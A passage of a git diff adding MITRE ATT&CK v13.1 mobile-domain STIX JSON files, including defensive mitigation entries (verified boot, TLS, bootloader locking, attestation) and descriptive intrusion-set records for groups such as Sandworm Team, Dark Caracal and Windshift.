"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321.json new file mode 100644 index 0000000000000000000000000000000000000000..654ae479b41cd20958e8e62d40ec26291dbfbcc9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--381c39ab-a5d4-4a89-8630-9382dd4d218d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.270Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1004", + "external_id": "M1004" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "System Partition Integrity", + "description": "Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8.json new file mode 100644 index 0000000000000000000000000000000000000000..ffe8c2f01bd2ead53fcbee767c24238bc5bc7081 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--2bbfd31b-d774-4eff-9888-1db0bdc297db", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.769Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1009", + "external_id": "M1009" + }, + { + "source_name": "TechCrunch-ATS", + "description": "Kate Conger. (2016, June 14). Apple will require HTTPS connections for iOS apps by the end of 2016. Retrieved December 19, 2016.", + "url": "https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/" + }, + { + "source_name": "Android-NetworkSecurityConfig", + "description": "Google. (n.d.). Network Security Configuration. Retrieved December 19, 2016.", + "url": "https://developer.android.com/training/articles/security-config.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Encrypt Network Traffic", + "description": "Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.\n\niOS's App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.\n\nAndroid's Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).\n\nUse of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58.json new file mode 100644 index 0000000000000000000000000000000000000000..8b5c9cf53c60a6a981cf67d19120f6a21ead0626 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--176bd630-6879-437d-9700-820ec6aa9711", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "type": "course-of-action", + "created": "2017-10-25T14:48:49.554Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1003", + "external_id": "M1003" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Lock Bootloader", + "description": "On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d.json new file mode 100644 index 0000000000000000000000000000000000000000..0aac6fd839d618f4ae81807a6ffdc8677a6e058c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--b3833279-11c1-4eb7-96ef-bb7ece2cd419", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "type": "course-of-action", + "created": "2019-10-18T12:51:36.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1001", + "url": "https://attack.mitre.org/mitigations/M1001" + } + ], + "modified": "2019-10-18T14:56:15.631Z", + "name": "Security Updates", + "description": "Install security updates in response to discovered vulnerabilities.\n\nPurchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.\n\nDecommission devices that will no longer receive security updates.\n\nLimit or block access to enterprise resources from devices that have not installed recent security updates.\n\nOn Android devices, access can be controlled based on each device's security patch level. On iOS devices, access can be controlled based on the iOS version.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433.json new file mode 100644 index 0000000000000000000000000000000000000000..fe1347be86942e367165f7b924432241ce677093 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--830d2874-a1cf-491c-b836-d17ee88f466f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1010", + "external_id": "M1010" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Deploy Compromised Device Detection Method", + "description": "A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e829ee51-1caf-4665-ba15-7f8979634124.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e829ee51-1caf-4665-ba15-7f8979634124.json new file mode 100644 index 0000000000000000000000000000000000000000..92ce5ff3afb0ac59d21e31098ed20d6cb49fbf0d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e829ee51-1caf-4665-ba15-7f8979634124.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--607fa945-7666-4b80-87b8-10305e49fcf1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1014", + "external_id": "M1014" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Interconnection Filtering", + "description": "In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9.json new file mode 100644 index 0000000000000000000000000000000000000000..2549dc3751ed9ad2b56d9c6cb155ab9873a897d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--eab8aec3-3b07-472a-9ea7-40b5e8dfe655", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9", + "created": "2017-10-25T14:48:51.365Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1007", + "url": "https://attack.mitre.org/mitigations/M1007" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Warn device users not to accept requests to grant Device Administrator access to applications without good reason.\n\nAdditionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.", + "modified": "2022-04-06T14:47:19.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Caution with Device Administrator Access", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c.json new file mode 100644 index 0000000000000000000000000000000000000000..10e212108efe41a606bde02134ee612f6fee254e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--7101ac28-e61d-49ab-adb9-5ab50c9f24cd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "type": "course-of-action", + "created": "2019-10-18T12:50:35.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1002", + "url": "https://attack.mitre.org/mitigations/M1002" + } + ], + "modified": "2019-10-18T14:52:53.019Z", + "name": "Attestation", + "description": "Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/mobile-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..613369691e2ace1350968533d21315d81bfe28d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--2a5226a7-8c87-49c0-af04-5385331a0983", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd.json new file mode 100644 index 0000000000000000000000000000000000000000..0c35c90700c9e71975714f4c5a068deb971f563b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--c19523a1-29c9-4fb2-9f94-35ecf83cce7f", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Bouncing Golf" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "type": "intrusion-set", + "created": "2020-01-27T16:55:39.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0097", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0097" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020." + } + ], + "modified": "2020-03-26T20:58:44.722Z", + "name": "Bouncing Golf", + "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json new file mode 100644 index 0000000000000000000000000000000000000000..9e95fa0608bc2e7b871a3ce73c8441db0606e4d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json @@ -0,0 +1,141 @@ +{ + "type": "bundle", + "id": "bundle--25c8b390-60d5-44dc-8796-8860f9991f2b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike\u2019s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json new file mode 100644 index 0000000000000000000000000000000000000000..8880c57f0530c27c35ab9f9bcc0547606fc1c609 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--7c82c6d4-75d3-4002-b424-04c96d5c74a2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Dark Caracal" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0070", + "external_id": "G0070" + }, + { + "source_name": "Dark Caracal", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2021-10-11T19:08:18.503Z", + "name": "Dark Caracal", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1.json new file mode 100644 index 0000000000000000000000000000000000000000..4eeae106648a248d6c3e0fb1d1fa1d9900703b63 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--9c5883ab-669e-4ed4-a2cb-a9a2447a22f2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Windshift", + "Bahamut" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "type": "intrusion-set", + "created": "2020-06-25T17:16:39.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0112", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0112" + }, + { + "source_name": "Bahamut", + "description": "(Citation: SANS Windshift August 2018)" + }, + { + "source_name": "SANS Windshift August 2018", + "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020." + }, + { + "source_name": "objective-see windtail1 dec 2018", + "url": "https://objective-see.com/blog/blog_0x3B.html", + "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019." + }, + { + "source_name": "objective-see windtail2 jan 2019", + "url": "https://objective-see.com/blog/blog_0x3D.html", + "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019." + } + ], + "modified": "2021-04-26T14:37:33.234Z", + "name": "Windshift", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 